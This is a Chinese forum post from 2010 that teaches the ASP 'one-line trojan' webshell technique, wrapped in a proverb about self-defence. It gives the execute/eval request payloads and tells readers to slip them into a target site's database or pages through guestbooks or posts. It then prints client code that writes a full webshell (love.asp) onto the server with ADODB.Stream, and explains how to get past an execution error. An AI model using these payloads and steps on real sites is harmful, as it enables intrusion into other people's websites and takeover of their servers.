热搜词
发表于 2010-9-15 10:39:12 | 显示全部楼层 |阅读模式
如何使用ASP一句话木马呢?俗话说的好:“害人之心不可有,防人之心不可无!”下面就由惟零广告为大家简单介绍一句话木马的使用方法,让您了解其工作原理,确保您的程序万无一失!
    ASP一句话木马
    当黑客要测试某个网站是否安全,就有可能在注册信息的电子邮箱或者个人主页等文本框中插入类似如下代码:
    <%execute request("value")%>
    <%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
    当黑客知道了您网站的数据库地址,就可以利用本地网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
    这就被称为一句话木马,它是基于B/S结构的。  
    ASP一句话木马使用方法
    首先,找到数据库是asp格式的网站,然后,以留言板或者发表文章的方式,把一句话添加到asp数据库或者加进asp网页。
    记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论你采用任何方式!
    然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后杀进去!这就可以干你想干的事情了!
    分析ASP一句话木马的工作原理
    首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了。分析Request.form('#')+''这句代码的意思,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,“#”号可以用其他变量表示,例如下面一句话客户端的代码:
    <textarea name="#自定义" cols="80" rows="9">
    set gxjiaju=server.createObject("Adodb.Stream")
    gxjiaju.Open  
    gxjiaju.Type=2  
    gxjiaju.CharSet="gb2312"  
    gxjiaju.writetext request("要写入的代码内容的文本域名称")
    gxjiaju.SaveToFile server.mappath("love.asp"),2  
    gxjiaju.Close  
    set gxjiaju=nothing  
    response.redirect "love.asp"  
    </textarea>
    学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#自定义')),然后执行(使用eval--(Request.form('#')+'')),“--”使用时请去掉,我这服务器空间被屏蔽了。这样也就被执行了以下内容:
    set gxjiaju=server.createObject("Adodb.Stream")  
    gxjiaju.Open  
    gxjiaju.Type=2  
    gxjiaju.CharSet="gb2312"  
    gxjiaju.writetext request("要写入的代码内容的文本域名称")  
    gxjiaju.SaveToFile server.mappath("love.asp"),2
    gxjiaju.Close  
    set gxjiaju=nothing  
    response.redirect "love.asp"
    学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象gxjiaju,然后使用对象中的writetext方法将request("文本框名称")读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们将用到的大马脚本)写入服务端的love.asp文件中,写入结束后使用set gxjiaju=nothing释放对象,然后使用response.redirect "love.asp" 跳转到新生成的love.asp文件,就是我们最后见的大马了!
    关于服务器错误
    通常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
    Script error detected at line 1.  
    Source line: execute request("nettoo")  
    Description: 类型不匹配: 'execute'
    这个如何解决呢?
    想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!
    以上是惟零广告总结的ASP一句话木马使用方法,希望您通过以上方法,来完善您自己网站的安全性,同时请不要忘了“害人之心不可有,防人之心不可无!”。
全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-25 07:09 , Processed in 0.153499 second(s), 22 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team